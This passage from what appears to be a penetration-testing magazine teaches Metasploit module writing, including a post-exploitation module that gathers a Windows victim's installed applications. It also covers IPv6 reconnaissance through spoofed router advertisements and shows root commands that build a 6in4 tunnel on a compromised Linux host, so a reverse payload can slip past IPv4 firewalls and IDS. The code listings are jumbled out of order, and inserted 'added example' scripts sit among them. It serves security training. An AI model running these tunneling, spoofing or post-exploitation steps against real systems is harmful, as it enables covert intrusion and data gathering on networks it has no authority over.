          send_cmd(['RMD', dir], true)
          print_status("#{target_host}:#{rport} Anonymous READ/WRITE (#{banner})")
          access_type = "rw"
        else
          print_status("#{target_host}:#{rport} Anonymous READ (#{banner})")
          access_type = "ro"
        end
testing. So if you are looking to contribute to the Metasploit community then you can work on post modules.

Basics of Module Building

So far we have seen the utility of modules and the power that they can add to the framework. In order to master the framework it is essential to understand the working and building of modules. This will help us in quickly extending the framework according to our needs. In the next few recipes we will see how we can use Ruby scripting to build our own modules and import them into the framework. To start building our own module we will need basic knowledge of Ruby scripting. In this discussion we will see how we can use Ruby to start building modules for the framework. The process is very similar to meterpreter scripting. The difference lies in using a set of pre-defined scripting lines that are required in order to make the framework understand the requirements and nature of the module. Let us start with some of the basics of module building. In order to make our module readable for the framework we will have to import the msf libraries.

require 'msf/core'

This is the first and foremost line of every script. This line tells that the module will include all the dependencies and functionalities of the Metasploit framework.

Listing 8. The result of the operation's failure

        report_auth_info(
          :host   => target_host,
          :port   => rport,
          :sname  => 'ftp',
          :user   => datastore['FTPUSER'],
          :pass   => datastore['FTPPASS'],
          :type   => "password_#{access_type}",
          :active => true
        )
      end
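As an added example, not the module's own code nor anything else from the article, here is the same anonymous read/write decision that Listings 7 and 8 make, written as a stand-alone Ruby script for auditing your own FTP servers. The in-process fake server, the 'anonymous' / 'mozilla@example.com' credentials and the loopback port are constructed for the example.

```ruby
require 'socket'
require 'securerandom'

# Constructed stand-in for an FTP server (not a real FTP daemon): it speaks
# just enough of the protocol for the check below (USER, PASS, MKD, RMD,
# QUIT) on a random loopback port and serves a single client.
# writable: selects whether MKD is accepted (257) or refused (550).
def start_fake_ftp(writable:)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  Thread.new do
    client = server.accept
    client.puts "220 fake-ftpd ready"
    while (line = client.gets)
      cmd, arg = line.strip.split(' ', 2)
      case cmd.to_s.upcase
      when 'USER' then client.puts "331 Password required"
      when 'PASS' then client.puts "230 Anonymous login ok"
      when 'MKD'  then client.puts(writable ? "257 \"/#{arg}\" created" : "550 Permission denied")
      when 'RMD'  then client.puts "250 Directory removed"
      when 'QUIT'
        client.puts "221 Goodbye"
        break
      else client.puts "500 Unknown command"
      end
    end
    client.close
    server.close
  end
  port
end

# Send one command line and return the server's (single-line) reply.
def ftp_cmd(sock, *words)
  sock.puts words.join(' ')
  sock.gets.to_s.strip
end

# The decision anonymous.rb makes: after an anonymous login, try MKD on a
# random directory name; a 2xx reply means write access ('rw'), anything
# else read-only ('ro'). Returns nil when the login itself is refused.
# Real servers may send multi-line ("220-") replies, which Rex's FTP mixin
# handles and this minimal client does not.
def anonymous_access(host, port, user: 'anonymous', pass: 'mozilla@example.com')
  sock = TCPSocket.new(host, port)
  sock.gets                                   # discard the banner
  ftp_cmd(sock, 'USER', user)
  return nil unless ftp_cmd(sock, 'PASS', pass) =~ /^2/
  dir = SecureRandom.alphanumeric(8)
  if ftp_cmd(sock, 'MKD', dir) =~ /^2/
    ftp_cmd(sock, 'RMD', dir)                 # remove the probe directory again
    'rw'
  else
    'ro'
  end
ensure
  if sock
    ftp_cmd(sock, 'QUIT') rescue nil
    sock.close
  end
end

if __FILE__ == $0
  puts "writable server : #{anonymous_access('127.0.0.1', start_fake_ftp(writable: true))}"
  puts "read-only server: #{anonymous_access('127.0.0.1', start_fake_ftp(writable: false))}"
end
```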

Listing 9. Importing the Framework libraries

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry

  def initialize(info = {})
    super(update_info(info,
      'Name'         => 'Windows Gather Installed Application Enumeration',
      'Description'  => %q{ This module will enumerate all installed applications },
      'License'      => MSF_LICENSE,
      'Platform'     => ['windows'],
      'SessionTypes' => ['meterpreter']
    ))
  end
class Metasploit3 < Msf::Auxiliary

This line defines the class which inherits the properties of the Auxiliary family. The Auxiliary module can import several functionalities like scanning, opening connections, using a database etc.

include Msf::

The include statement can be used to include a particular functionality of the framework into our own module. For example, if we are building a scanner module then we can include it as:

include Msf::Exploit::Remote::TCP

This line will include the functionality of a remote TCP scan in the module. This line will pull the main scan module libraries from the Metasploit library (Listing 5).

The next few lines of script give us an introduction to the module like its name, version, author, description etc (Listing 6). The next few lines of the script are used to initialize values for the script. The options which are marked as 'true' are those which are essentially required for the module, whereas the options marked as false are optional. These values can be passed/changed during the execution of a module.

The best way to learn about modules is by mastering Ruby scripting and by analyzing existing modules. Let us analyse a simple module here in order to dive deeper into module building. We will be analyzing the ftp anonymous access module. You can find the main script at the following location: pentest/exploits/framework3/modules/auxiliary/scanner/ftp/anonymous.rb.

Let us start with the analysis of the main script body to understand how it works.

  def run_host(target_host)
    begin
      res = connect_login(true, false)

Listing 10. Defining different columns

  def app_list
    tbl = Rex::Ui::Text::Table.new(
      'Header'  => "Installed Applications",
      'Indent'  => 1,
      'Columns' => [
        "Name",
        "Version"
      ])

    appkeys = [
      'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
      'HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
      'HKLM\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
      'HKCU\\SOFTWARE\\WOW6432NODE\\Microsoft\\Windows\\CurrentVersion\\Uninstall',
    ]

    apps = []
    appkeys.each do |keyx86|
      found_keys = registry_enumkeys(keyx86)
      if found_keys
        found_keys.each do |ak|
          apps << keyx86 + "\\" + ak
        end
      end
    end

      banner.strip! if banner

      dir = Rex::Text.rand_text_alpha(8)

This function is used to begin the connection. The res variable holds the Boolean value true or false. The connect_login function is a specific function used by the module to establish a connection with the remote host. Depending upon the success or failure of the connection, the Boolean value is stored in res (Listing 7).

Once the connection has been set up, the module tries to check whether the anonymous user has read/write privilege or not. The write_check variable checks if a write operation is possible or not. Then it is checked whether the operation succeeded or not. Depending upon the status, the privilege message is printed on the screen. If the write operation fails then the status is printed as 'ro' or read-only (Listing 8).

The next function is used to report authorization info. It reflects important parameters like host, port, user, pass etc. These are the values that appear to us when we use the show options command, so these values are user dependent.

This was a quick demonstration of how a simple module functions within the framework. You can change the existing scripts accordingly to meet your needs. This makes the platform extremely portable to development. As I have said, the best way to learn more about module building is by analyzing the existing scripts.

Building your own Post Exploitation module

Now we have covered enough background about building modules. Here we will see an example of how we can build our own module and add it into the framework. Building modules can be very handy as it gives us the power of extending the framework depending on our needs.

Let us build a small post exploitation module that will enumerate all the installed applications on the target machine. Since it is a post exploitation module, we will require a compromised target

Listing 11. The enumeration process

    t = []
    while (not apps.empty?)
      1.upto(16) do
        t << framework.threads.spawn("Module(#{self.refname})", false, apps.shift) do |k|
          begin
            dispnm = registry_getvaldata("#{k}", "DisplayName")
            dispversion = registry_getvaldata("#{k}", "DisplayVersion")
            tbl << [dispnm, dispversion] if dispnm and dispversion
          rescue
          end
        end
      end
      t.map { |x| x.join }  # wait for this batch of worker threads
    end

Listing 12. The functions of the script

    results = tbl.to_s
    print_line("\n" + results + "\n")

    p = store_loot("host.applications", "text/plain", session, results, "applications.txt", "Installed Applications")
    print_status("Results stored in: #{p}")
  end

  def run
    print_status("Enumerating applications installed on #{sysinfo['Computer']}")
    app_list
  end
end
in order to execute the module. To start building the module we will first import the framework libraries and include the required dependencies (Listing 9).

The script starts with including the Metasploit core libraries. Then we build up the class that extends the properties of Msf::Post modules.

Next we create the initialize function which is used to initialize and define the module properties and description. This basic structure remains the same in almost all modules. Now our next step will be to create a table that can display our extracted result. We have a special library Rex::Ui::Text which can be used for this task. We will have to define different columns (Listing 10).

The script body starts with building the table and providing different column names. Then a separate array of registry locations is created which will be used to enumerate the application list. The application information is maintained in a separate array named apps.

Then we start the enumeration process by running a loop that looks into the different registry locations stored in the appkeys array (Listing 11).

The next lines of the script populate the table with different values in the respective columns. The script uses the built-in function registry_getvaldata which fetches the values and adds them to the table (Listing 12).

The last few lines of the script are used for storing the information in a separate text file called applications.txt. The file is populated by using the store_loot function which stores the complete table in the text file.

Finally an output is displayed on the screen stating that the file has been created and results have been stored in it.

The next step will be to store the complete program in the respective directory. You have to make sure that you choose the correct directory for storing your module. This will help the framework in clearly understanding the utility of the module and will maintain a hierarchy.

To identify the location of module storage, there are the following points you should look at:

• Type of module

• Operation performed by the module

• Affected software or operating system.

These are a few points to keep in mind before you save any module in any folder. Let us consider our module. This module is a post exploitation module that is used to enumerate a Windows operating system and gathers information about the system. So our module should follow this convention for storing.

So our destination folder should be modules/post/windows/gather/.

You can save the module with your desired name and with a .rb extension. Let's save it as enum_applications.rb.

Making the Module work

Once we have saved the module in its preferred directory, the next step will be to execute it and see if it is working fine.

msf > use post/windows/gather/enum_applications
msf post(enum_applications) > show options

Module Options (post/windows/gather/enum_applications):

Name     Current Setting  Required  Description
SESSION                   yes       The session...

This was a small example of how you can build and add your own module to the framework. You definitely need a sound knowledge of Ruby scripting if you want to build good modules. You can also contribute to the Metasploit community by releasing your module and letting others benefit from it.
How to Explore the IPv6 Attack Surface with Metasploit

IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.



Earlier this year, the creators of the Metasploit Framework introduced support for IPv6, adding tools to allow attackers and defenders to explore this brave new world, and the increased attack surface it can offer.

In this article we will introduce Metasploit's three IPv6 enumeration modules, how to use them, and what they are doing "under the hood". We'll also cover the core IPv6 concepts that allow these modules to function as they do. Finally, we'll take a look at configuring an IPv6 tunnel from a compromised host, to allow the use of a reverse connection IPv6 payload over the IPv6 Internet.

I find few commands as satisfying to execute 
as "msfupdate". To many this may sound like a 
strange statement, but there are plenty of people 
who will completely understand where I'm coming 
from. 

Every time I enter "msfupdate", I sit back in my 
chair and watch as my copy of the Metasploit 
Framework connects to the Metasploit servers and 
downloads the latest modules. I run that command 
at least daily, and every time I do, it always grabs 
me something new to dissect and work into my 
penetration-testing toolbox. 

I'm often surprised by the frequency and volume 
of some of the updates, but really I shouldn't be. Af- 
ter all, the whole purpose of the Metasploit project 
is to provide a modular framework that allows ex- 
ploits to be written in a standardized fashion to en- 
courage community collaboration. Still, it's refresh- 



ing to see that even after the project transitioned 
from a "pure" open source project to commercially 
owned and operated one (Metasploit was acquired 
by Rapid 7 in 2009), the community is still contrib- 
uting, and those contributions are still released un- 
der the original open-source license. According to 
Rapid 7, this will never change. 
Figure 1. Typical output from "msfupdate" containing new additions and updates to existing

Earlier this year "msfupdate" fetched some updates that made me lean forward faster and look a little closer than perhaps I normally would. Metasploit downloaded a selection of modules with "IPv6" in the description.

IPv6 has been creeping into our lives over the 
past several years. Our operating systems, net- 
work equipment and phones have been gradually 
adding support for the new version of the protocol 
that will keep future networks and the internet run- 
ning, when the current version of the internet pro- 
tocol (IPv4) is finally retired due to address space 
exhaustion. 

As you might expect, IPv6 offers some advantag- 
es over its predecessor. Primarily, the vast address 
space will ensure that theoretically every grain of 
sand on the planet could own an Internet connect- 
ed device and not have to worry about hiding be- 
hind a NAT'ed IP. Additionally, IPv6 supports state- 
less auto-configuration - meaning that network 
administrators will no longer have to set up and 
manage DHCP servers, as IPv6 can "figure itself 
out" via the use of such mechanisms as neighbor 
discovery protocol messages sent via ICMP ver- 
sion 6. 

This is by no means an extensive list of differ- 
ences, but I'd like to pause and consider the sec- 
ond "advantage" of IPv6 I've just mentioned from 
a security perspective. It's this feature of IPv6 that 
the first batch of Metasploit IPv6 modules take ad- 
vantage of. 

One thing should be made very clear before we 
go any further. IPv6 is not any more or less se- 
cure than IPv4. They both do different things in 
different ways, and understanding the differences 
is key for network administrators to successful- 
ly implement the new protocol in a secure fash- 
ion. The biggest insecurity in IPv6 at the moment 
is that there are very few IPv6-only networks out 
there. 

99% of the time you'll find spots of IPv6 traffic 
wandering across the same wires as its older sib- 
ling, quietly going about its business. Similarly, 
99% of the time you can ask a network adminis- 
trator what they think that traffic is up to and they'll 
reply with something along the lines of "erm, well 
that's just noise, we don't use IPv6 yet". 

They likely aren't doing anything with v6 just yet, 
but that doesn't mean the devices sitting on the 
network aren't. Out of the box, IPv6 is designed 
to "go find the quickest way to the Internet". When 
you think of it like that, perhaps it's time for network 
admins to "get all up" in IPv6's business and see 
what it's up to. After all, if devices are using it to 
communicate freely, then so can we. 

Currently Metasploit features a handful of scan- 
ner modules for IPv6 discovery, and IPv6 enabled 
versions of its traditional payloads. A quick and 
easy way to locate the IPv6 modules is to run the 
command "search ipv6" from within the Metasploit 
Console (Figure 2). 

Let's take a moment to dissect the scanner mod- 
ules, and what we can learn from them. First up is 
"ipv6_multicast_ping", written by wuntee. 

This module sends a number of ICMPv6 packets to the various IPv6 addresses that are defined as multicast addresses, to which all IPv6 enabled hosts should respond. Then it listens for the ICMPv6 echo-reply responses and records both the IPv6 address and the hardware (MAC) address of the responding host. Very quickly we can learn which hosts on our local network are IPv6 enabled. When configuring the module we have the option of specifying the source IPv6 address and source MAC. The only mandatory option is a timeout, which is set at 5 seconds by default (Figure 3).

Figure 2. Currently Metasploit offers three auxiliary scanner modules for IPv6 discovery and multiple payloads that run over IPv6

Let's take a closer look at the IPv6 multicast ad- 
dresses we ping with this module. IPv6 addresses 
have a "scope" in which they are considered valid 
and unique. This could be an address in the global 
scope, the site scope, link-local or interface local 
scope. Each scope features a well-known multi- 
cast address, which certain types of host are ex- 
pected to join. The module has a sequential list of 
those addresses that it works its way through. We 
can pull those addresses from the Ruby code for 
the module. 

• FF01::1 - All nodes on the interface-local scope.

• FF01::2 - All routers in the interface-local scope.

• FF02::1 - All nodes in the link-local scope.

• FF02::2 - All routers on the link-local scope.

• FF02::5 - All OSPFv3 link state routers.

• FF02::6 - All OSPFv3 designated routers.

• FF02::9 - All RIP routers.

• FF02::a - All EIGRP routers.

• FF02::d - All Protocol Independent Multicast routers.

• FF02::16 - Multicast Listener Discovery reports.

• FF02::1:2 - All DHCP servers in the link-local scope.

• FF05::1:3 - All DHCP servers in the site-local scope.

To better understand the idea of IPv6 scopes we can compare them to their IPv4 equivalents. The global scope is best compared to any public IP address range in IPv4. A global IPv6 address can uniquely identify a host on the Internet. Site-local should be considered equivalent to RFC1918 private IP addressing and is used within a specific site, such as an office. Interface-local is similar to an APIPA or 169* IPv4 address, and is automatically generated to allow communication across a link without the need for any other routing information.

Figure 3. Quickly locating nearby IPv6 enabled hosts with ipv6_multicast_ping

One difference between link-local addresses in 
IPv6 and IPv4 is that there always needs to be one 
assigned to every IPv6 enabled interface - even 
when it has other addresses. That means that as 
long as there is IPv6 on the network, there will 
be link-local addresses in the link-local multicast 
scope. You can spot a link-local address because 
it will have the prefix "fe80". As you might expect, 
these addresses cannot be routed over the Inter- 
net. So while they can be used to communicate 
with a machine in the same layer 2 broadcast do- 
mains as the host you are working from, if you want 
to be able to have fun across the IPv6 Internet, a 
global address is required. We'll talk about obtain- 
ing one of those later. 

Our next Metasploit module is "ipv6_neighbor", created by belch <>. This enumeration module takes advantage of Neighbor Discovery Protocol (NDP). NDP uses a subset of ICMPv6 packets used by IPv6 to perform various auto-configuration and link state monitoring tasks to find the link-local addresses of IPv6 hosts within the same segment.

As an aside, one such NDP task is determining if its intended link-local address is already in use. This process, imaginatively called duplicate address detection (DAD), is actually prone to denial of service. Tools exist, although not presently packaged as Metasploit modules, which will respond to all DAD requests with "address in use" messages. This will prevent any new IPv6 devices that join the network from configuring a link-local address, as every option they advertise will be reported as a duplicate. One such tool for this task is "dos-new-ip6" written by van Hauser.

Figure 4. Mapping the relationship between IPv4 and IPv6 link-local addresses

Back to the module in question. Its purpose is 
to take an IPv4 range and show you the relation- 
ship between the IPv4 and IPv6 addresses on the 
target network. This allows you to quickly identify 
which hosts are dual-stacked, that is, running both 
IPv4 and IPv6 side by side (Figure 4). 

To do this it actually completes two tasks as 
part of its execution. The first is a blast from the 
past - we perform an ARP sweep of the given 
IPv4 range, to learn the MAC address of each 
IPv4 host. Secondly it will send an ICMPv6 neigh- 
bor solicitation packet, from which we'll learn the 
MAC address of the IPv6 enabled host. Compare 
the two MAC addresses, if any match - we have 
our mapping. 

Seeing these two processes side-by-side is in- 
teresting as ICMPv6 neighbor discovery is IPv6's 
ARP replacement, and we can compare the way 
they go about doing the same job. Unlike IPv4, 
IPv6 does not implement broadcast. The reason 
for this is efficiency. Traditional ARP uses broad- 
cast to query all the hosts on the subnet to find 
the MAC address of an IPv4 host so it can make 
a layer 2 delivery. In other words, everyone gets 
bugged every time someone wants to locate a 
MAC address. 

In IPv6, the process relies on multicasting, which means that fewer hosts get bugged and the address resolution process is much quicker.

Neighbor solicitation packets are sent to a special kind of multicast address, known as a solicited-node multicast address. Each IPv6 interface will have such an address and its purpose is to provide the layer 2 (MAC address) of the host. These addresses are generated using a simple algorithm, which drops all but the last 24 bits of the host's regular unicast address and appends them to the prefix FF02::1:FF00:0/104.

Using Wireshark to capture the ICMPv6 pack- 
ets sent out by the Metasploit module we can see 
these addresses in action (Figure 5). 

Notice how in packets 231 and 232, we send a neighbor solicitation to the solicited-node multicast address ff02::1:ff8f:ddb3, and we get our response back in the form of a neighbor advertisement from the unicast link-local address of the host (fe80::7256:81ff:fe8f:ddb3). An ICMPv6 neighbor advertisement can either be sent in response to a solicitation, as we've just shown, or it can be sent unsolicited to an all-node multicast address to inform neighbors of a change in address or link state.
The final scanner module currently in Metasploit is ipv6_neighbor_router_advertisement, which like ipv6_multicast_ping is also written by wuntee.

ICMPv6 router advertisements and solicitations 
are fairly similar to neighbor advertisements and 
solicitations, but as you can probably guess, are 
used to discover routers rather than "regular" 
hosts. Routers transmit advertisements on a reg- 
ular basis via multicast, and also in response to 
router solicitations from hosts on the network. 

This module aims to enumerate link-local IPv6 addresses by crafting and transmitting false router advertisements for a new network prefix via multicast. In turn this triggers every host in that multicast scope to start the auto-configuration process, create a new global IPv6 address on its interface and send a neighbor advertisement for that address. The module then manipulates the IPv6 address in the advertisement, dropping the newly acquired global prefix and replacing it with the standard link-local prefix. Finally, to confirm that the enumerated address is in fact alive, it sends out a neighbor solicitation message.

This works under the assumption that the operat- 
ing system uses the same interface portion of the 
IPv6 address on all of its addresses (Figure 6). 
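The address arithmetic behind both techniques (the solicited-node address targeted by the neighbor solicitations captured in Figure 5, and the prefix swap that ipv6_neighbor_router_advertisement performs on the auto-configured global address in Figure 6) is short enough to check by hand. The following Python is an added example, not code from the Metasploit modules or from the article: it derives the solicited-node multicast address for a unicast address, reproduces the global-to-link-local swap, and tests whether an interface identifier is EUI-64 (MAC-derived), which is exactly the assumption the router-advertisement trick depends on. The addresses are the ones shown in the captures; the MAC that falls out of the link-local address follows from the EUI-64 rule and is not stated on the page.

```python
import ipaddress

# Constants from the article: solicited-node prefix ff02::1:ff00:0/104 (RFC 4291 2.7.1)
# and the link-local prefix fe80::/64.
SOLICITED_NODE_PREFIX = ipaddress.IPv6Address("ff02::1:ff00:0")
LINK_LOCAL_PREFIX = ipaddress.IPv6Address("fe80::")
IID_MASK = (1 << 64) - 1


def solicited_node_multicast(unicast: str) -> str:
    """Drop all but the low 24 bits of the unicast address and append them to ff02::1:ff00:0/104."""
    low24 = int(ipaddress.IPv6Address(unicast)) & 0xFFFFFF
    return str(ipaddress.IPv6Address(int(SOLICITED_NODE_PREFIX) | low24))


def interface_id(addr: str) -> int:
    """Low 64 bits of an IPv6 address: the interface identifier."""
    return int(ipaddress.IPv6Address(addr)) & IID_MASK


def global_to_link_local(global_addr: str) -> str:
    """What the router-advertisement module does: keep the interface identifier of the
    freshly auto-configured global address and put the link-local prefix in front of it."""
    return str(ipaddress.IPv6Address(int(LINK_LOCAL_PREFIX) | interface_id(global_addr)))


def is_eui64(addr: str) -> bool:
    """True when the interface identifier carries the 0xfffe marker of a MAC-derived
    (modified EUI-64) identifier. Hosts that randomize the identifier (privacy
    extensions) return False, and for those the link-local address the module
    calculates may simply not exist."""
    return (interface_id(addr) >> 24) & 0xFFFF == 0xFFFE


def eui64_to_mac(addr: str) -> str:
    """Invert modified EUI-64: remove the inserted ff:fe and flip the universal/local bit."""
    if not is_eui64(addr):
        raise ValueError("interface identifier is not EUI-64 derived")
    b = interface_id(addr).to_bytes(8, "big")
    mac = bytes([b[0] ^ 0x02]) + b[1:3] + b[5:8]
    return ":".join("%02x" % x for x in mac)


def predict_link_local(global_addr: str):
    """The two checks combined the way an operator would use them: return the predicted
    link-local address only when the identifier is EUI-64, otherwise None."""
    return global_to_link_local(global_addr) if is_eui64(global_addr) else None


if __name__ == "__main__":
    ll = "fe80::7256:81ff:fe8f:ddb3"                     # link-local address from Figure 5
    ga = "2001:1234:dead:beef:7256:81ff:fe8f:ddb3"       # auto-configured address from Figure 8
    print(solicited_node_multicast(ll))   # ff02::1:ff8f:ddb3
    print(predict_link_local(ga))         # fe80::7256:81ff:fe8f:ddb3
    print(eui64_to_mac(ll))               # 70:56:81:8f:dd:b3
```

Run predict_link_local over the addresses in the neighbor advertisements you capture: a None result is a host whose link-local address the module will guess wrong, and is the case the article warns about.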

So let's take a closer look at the module in action. We don't need to provide any options other than a couple of timeout parameters, which by default are set at 5 and 1 seconds respectively. Once we run the module it will begin sending advertisements for the network prefix 2001:1234:dead:beef::/64 to the multicast address ff02::1, which as we know from earlier is "all nodes in the link-local scope". Incidentally, this network prefix is hard coded into the module's source (Figure 7).

Upon receipt of the advertisement all hosts on 
the local scope will begin auto-configuration of a 
new IPv6 address within the new prefix (Figure 8). 

Of the three enumeration modules we've looked at, this is by far the noisiest and therefore the most likely to be detected: we are actually setting an address on every host in the multicast scope, and there is no guarantee that the interface portion of the new address will match the link-local address calculated by the module, because some systems randomize the interface identifier (privacy extensions) instead of deriving it from the MAC address. Having said that, it's always good to have different ways of achieving the same goal!

So far we've concentrated on the auxiliary modules in the Metasploit framework and on some basic IPv6 enumeration in the link-local scope. This is an important first step and assumes that you already have some sort of foothold in the network, but let's say we now want to take things one step further. We are going to try to break out onto the IPv6 Internet, and that means we'll need a tunnel.

The idea of tunneling out using IPv6 encapsulat- 
ed in IPv4 packets is a very attractive proposition, 
Figure 5. ICMPv6 NDP packets, sent initially to the solicited-node multicast addresses of each host

Figure 6. Using false router advertisements with "ipv6_neighbor_router_advertisement" to obtain link-local addresses



Figure 7. Sending an ICMPv6 router advertisement message 
for the network prefix "2001:1234:dead:beef", as captured by 
Wireshark 
as many controls, such as IPS/IDS and firewalls, will not be configured to alert on or prevent such traffic leaving.
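What that tunnel looks like on the wire is simple enough to decode without a full packet parser. The following Python is an added example, not code from the article: it builds a constructed 6in4 packet (an IPv4 header with protocol 41 carrying an IPv6 header) between the addresses used in this scenario, decodes it back, and flags such packets leaving the internal range, which is the rule a defender would add to an IDS or egress filter that currently lets protocol 41 through. The Google address is the one pinged later in the article; the ICMPv6 echo header is constructed with its checksum left at zero and is not a real capture.

```python
import ipaddress
import struct

IPPROTO_IPV6 = 41    # IPv4 protocol number for IPv6-in-IPv4 (6in4, the Linux "sit" tunnel)
IPPROTO_ICMPV6 = 58


def ipv4_checksum(header: bytes) -> int:
    """One's-complement sum over the IPv4 header (checksum field zeroed when computing)."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_6in4(outer_src, outer_dst, inner_src, inner_dst, payload=b"",
               next_header=IPPROTO_ICMPV6, ttl=255):
    """Constructed sample packet: IPv4 (protocol 41) wrapped around a minimal IPv6 header."""
    ipv6_hdr = struct.pack(
        "!IHBB16s16s",
        0x60000000,                      # version 6, traffic class 0, flow label 0
        len(payload), next_header, 64,   # payload length, next header, hop limit
        ipaddress.IPv6Address(inner_src).packed,
        ipaddress.IPv6Address(inner_dst).packed,
    )
    inner = ipv6_hdr + payload
    ipv4_hdr = struct.pack(
        "!BBHHHBBH4s4s",
        0x45, 0, 20 + len(inner),        # version 4 / IHL 5, DSCP 0, total length
        0, 0,                            # identification, flags + fragment offset
        ttl, IPPROTO_IPV6, 0,            # TTL, protocol 41, checksum placeholder
        ipaddress.IPv4Address(outer_src).packed,
        ipaddress.IPv4Address(outer_dst).packed,
    )
    csum = struct.pack("!H", ipv4_checksum(ipv4_hdr))
    return ipv4_hdr[:10] + csum + ipv4_hdr[12:] + inner


def decode_6in4(pkt: bytes):
    """Return (outer_src, outer_dst, inner_src, inner_dst) for an IPv4/41/IPv6 packet, else None."""
    if len(pkt) < 20 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != IPPROTO_IPV6:
        return None
    inner = pkt[ihl:]
    if len(inner) < 40 or inner[0] >> 4 != 6:
        return None
    return (
        str(ipaddress.IPv4Address(pkt[12:16])),
        str(ipaddress.IPv4Address(pkt[16:20])),
        str(ipaddress.IPv6Address(inner[8:24])),
        str(ipaddress.IPv6Address(inner[24:40])),
    )


def find_6in4_egress(packets, internal_net="192.168.0.0/24"):
    """The egress rule in one function: protocol-41 packets whose outer source is inside
    internal_net and whose outer destination is outside it, i.e. a tunnel leaving the LAN."""
    net = ipaddress.IPv4Network(internal_net)
    hits = []
    for pkt in packets:
        d = decode_6in4(pkt)
        if d and ipaddress.IPv4Address(d[0]) in net and ipaddress.IPv4Address(d[1]) not in net:
            hits.append(d)
    return hits


# Constructed ICMPv6 echo request header: type 128, code 0, checksum 0 (not computed), id 1, seq 1.
SAMPLE_ECHO = struct.pack("!BBHHH", 128, 0, 0, 1, 1)
# Scenario addresses: target 192.168.0.115 / 2001:db8::21, he.net tunnel server 72.52.104.74.
SAMPLE_TUNNEL_PKT = build_6in4("192.168.0.115", "72.52.104.74",
                               "2001:db8::21", "2607:f8b0:400e:c00::93", SAMPLE_ECHO)

if __name__ == "__main__":
    print(decode_6in4(SAMPLE_TUNNEL_PKT))
    print(find_6in4_egress([SAMPLE_TUNNEL_PKT]))
```

Feed find_6in4_egress raw IPv4 frames from a capture on the gateway: a single hit is enough to show that a host is carrying IPv6 out of the network in a way no IPv4-only firewall rule inspects.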

So the scenario is as follows - we've compro- 
mised a Linux machine using Metasploit and we 
have a shell. The host has IPv6 support and a 
link-local address. Now we want to create a glob- 
al IPv6 address on the box to allow it to commu- 
nicate back to us over the IPv6 Internet for extra 
obscurity. 

You need two things to get an IPv6 tunnel to work. First, a tunnel broker, of which there are plenty, many of them free of charge. Second, if the box you are working on is behind a NAT device, that device must forward protocol 41, in other words IPv6 encapsulated in IPv4, to the box. If we are behind a NAT device that doesn't forward protocol 41, we are out of luck (Figure 9).

For the purposes of this example I'll be using 
a tunnel provided by Hurricane Electric (he.net). 
Once signed up, the tunnel broker provides both 
a client and server IPv6 address, and an IPv4 ad- 
dress of the tunnel broker server. 

These values will be as follows: 

HE.net Tunnel Server IPv4 address - 72.52.104.74
HE.net Tunnel Server IPv6 address - 2001:DB8::20
Target Network Outside NAT IPv4 address - 1.1.1.1
Target Machine IPv4 Address - 192.168.0.115
Target Machine IPv6 Address - 2001:DB8::21

[Figure 8 residue: two "ifconfig" outputs from the Mac OS X host. Before the false advertisement the interface carries 192.168.0.101 and the link-local address fe80::7256:81ff:fe8f:ddb3; afterwards it also carries 2001:1234:dead:beef:7256:81ff:fe8f:ddb3, marked tentative and autoconf.]

Figure 8. Two outputs of "ifconfig" on a Mac OS X machine on the same network as our Metasploit instance. The first output is pre-false advertisement, the second is just after. Notice the addition of a "dead:beef" IPv6 address, thanks to auto-configuration

[Figure 9 residue: "ifconfig" on the compromised Linux host. eth0 has inet addr 192.168.0.115, mask 255.255.255.0 and a link-local inet6 address; lo has 127.0.0.1 and ::1/128.]

Note 

You may have noticed the outside IPv4 and IPv6 
addresses used in this example will not work in 
real life. The IPv6 address prefix I've used is re- 
served for documentation, and is not routable over 
the Internet. 

When configuring the tunnel in the he.net site, you 
must provide the outside IPv4 address of the target. 
It should also be noted, that he.net site requires that 
this address responds to ping (Figure 10). 

Back on our victim machine, we run a few commands to bring up the new tunnel interface and set up a route to ensure all IPv6 traffic goes via that new interface. These need root, and they do not survive a reboot. Note that the tunnel's local endpoint is the private address 192.168.0.115 while he.net was given the outside address 1.1.1.1; this only works because the NAT device forwards protocol 41 to the target.

# ip tunnel add ipv6inet mode sit remote 72.52.104.74 local 192.168.0.115 ttl 255

This creates a SIT (Simple Internet Transition) interface named ipv6inet and defines the local and remote IPv4 addresses for the tunnel endpoints, or in other words the IP of the target machine and of the tunnel server.

# ip link set ipv6inet up

This brings the tunnel interface up.
Figure 10. Signing up for an IPv6 tunnel from Hurricane Electric (ipv6.he.net)

Figure 9. On the compromised Linux host "webapp1", eth0 has an IPv4 and a link-local IPv6 address

Figure 11. Creating an IPv6 tunnel interface on the target machine
# ip addr add 2001:db8::21 dev ipv6inet

This assigns the IPv6 address to the interface.

# ip route add ::/0 dev ipv6inet

This adds a default route that sends all IPv6 traffic across the new tunnel interface (Figure 11). Link-local traffic is unaffected, because fe80::/64 is always routed via the interface it belongs to.

A quick way to confirm that the IPv6 Internet is now within our reach is to use the ping6 utility to hit an IPv6 website, in this case ipv6.google.com, which at the time of writing had the address 2607:f8b0:400e:c00::93 (Figure 12).

This tunnel can now be used by a Metasploit re- 
verse connection payload to connect to an attack- 
er with a global IPv6 address of their own, which of 
course can be obtained in exactly the same way as 
we've just shown. 

Let's say in this example we want our payload to 
connect back to us at the address 2001 :db8: :99 
(Figure 13). 

